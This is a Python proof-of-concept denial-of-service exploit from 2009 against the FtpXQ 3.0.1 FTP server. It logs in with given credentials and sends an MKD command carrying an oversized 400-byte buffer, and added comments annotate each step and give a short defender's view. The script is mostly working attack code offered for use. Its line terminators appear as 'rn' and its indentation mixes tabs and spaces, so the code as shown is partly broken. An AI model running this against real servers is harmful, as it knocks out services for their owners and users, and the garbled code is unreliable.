
# Title : FtpXQ authenticated remote Dos
# Published : 2009-11-17
# Author : Marc Doudiet


#!/usr/bin/python

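# Banner printed by start() before it connects. It records the author's stated
# scope: FtpXQ 3.0.1 (trial build), tested on XP SP2, an authenticated account
# with write access, and the MKD command as the place where the fault occurs.
# The page arrived with each "\r\n" flattened to the letters "rn"; the line
# endings are restored here and added to the two entries that had none, so
# every "* " entry prints on its own line.
banner = (
    "*************************\r\n"
    "* Exploit Title: FtpXQ authenticated remote Dos\r\n"
    "* (trial on http://www.datawizard.net/Products/FtpXQ/Setup.EXE) Version 3.0.1\r\n"
    "* Tested on XP sp2 english\r\n"
    "* Needs write access --> vuln on MKD command\r\n"
    "* Vulnerability found by Marc Doudiet\r\n"
    "* For educational purpose only\r\n"
    "* Proof of concept code\r\n"
)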


import socket
import sys

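def Usage():
    """Print the expected command line.

    The three positional arguments are, in order, the FTP account name, its
    password and the target host. The top-level argument check calls this
    when the argument count is wrong.
    """
    # The page shows a bare "n" where the newline escape lost its backslash.
    print ("Usage: ./ftpxq.py <Username> <password> <host>\n")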

# Filler that start() sends as the MKD argument: 400 "A" characters.
# The page gives this one length only; it does not state a minimum that
# triggers the fault.
string = 400 * "A"

def start(username, password, hostname):
	"""Log in to the FTP service on hostname:21 and send one MKD command.

	username, password -- credentials sent with USER and PASS.
	hostname -- address passed to socket.connect() together with port 21.

	The MKD argument is the module-level 400-character `string`. Every
	server reply is read with recv(1024) and thrown away, so the function
	never learns whether the login succeeded or how the server reacted to
	the MKD. On a connection failure it prints an error and exits with
	status 1. The socket is never closed.

	Defender's view: per the banner the account needs write access, so
	denying directory creation to untrusted accounts should remove the
	reachable path, and an MKD argument hundreds of bytes long stands out
	in FTP command logs. The page names no fixed version.
	"""
    	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	print banner
    	try:
        	s.connect((hostname, 21))
		# Printed only after connect() has already returned.
		print "[-] Connecting to the FTP ..."
	# Bare except: any exception raised in the try body ends the run here.
    	except:
        	print ("[-] Connection error!")
        	sys.exit(1)
	# Server greeting, read and discarded.
	s.recv(1024)
	# NOTE(review): the trailing 'rn' in these literals looks like a line
	# terminator whose backslashes were lost when the page was extracted;
	# confirm against the original advisory.
	s.send('USER '+username+'rn')
	# Reply to USER is not inspected.
	s.recv(1024)
	s.send('PASS '+password+'rn')
	# Reply to PASS is not inspected, so a rejected login goes unnoticed.
	s.recv(1024)
	print "[-] Sending evil buffer ...rn"
	# No reply is read after MKD; nothing here observes the server's state.
	s.send('MKD '+string+'rn')

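# Entry point. Arguments follow Usage(): <Username> <password> <host>.
# The local names now match start()'s parameters; the values reach the same
# parameters as before, only the misleading hostname/username/passwd labels
# are gone.
if len(sys.argv) != 4:
    Usage()
    sys.exit(1)

username = sys.argv[1]
password = sys.argv[2]
hostname = sys.argv[3]
start(username, password, hostname)
# Printed unconditionally: start() reads no reply after MKD, so this line is
# not evidence that the service stopped. Check the test host itself (service
# state, crash log) before recording a result.
print ("[-] Exploit seems to work")
sys.exit(0)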